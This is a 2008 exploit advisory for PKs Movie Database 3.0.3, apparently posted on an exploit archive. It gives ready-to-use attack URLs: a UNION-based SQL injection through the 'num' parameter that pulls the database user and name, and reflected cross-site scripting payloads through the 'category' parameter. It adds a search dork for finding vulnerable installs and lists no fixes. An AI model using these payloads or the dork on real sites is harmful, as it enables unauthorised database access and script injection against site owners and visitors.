PKs Movie Database 3.0.3 XSS - SQL Injection Vulnerabilities

2008-02-10 00:00:00

-------------------------------------------------------------
----- H-T Team [ HouSSaMix + ToXiC350 ] from MoroCCo --------
-------------------------------------------------------------

= Author : HouSSaMix From H-T Team
= Script : PKs Movie Database version 3.0.3

= Original advisory : http://www.securityfocus.com/bid/27713/

= BUG 1 : Remote SQL Injection Vulnerability

exploit => www.target.com/path/index.php?num=-1%20union%20select%201,2,3,4,5,6,user(),database(),9,10,11,12,13,14,15,16,17,18,19,20

= BUG 2 : XSS

exploit => www.target.com/path/index.php?category=[XSS]
www.target.com/path/index.php?num=9999999999&category=[XSS]

example : www.target.com/path/index.php?category=%22%3E%3Cscript%3Ealert(1);%3C/script%3E
www.target.com/path/index.php?num=9999999999&category=%22%3E%3Cscript%3Ealert(1);%3C/script%3E

= Dork : "PKs Movie Database"

#

Fixes

No fixes

Per poter inviare un fix è necessario essere utenti registrati.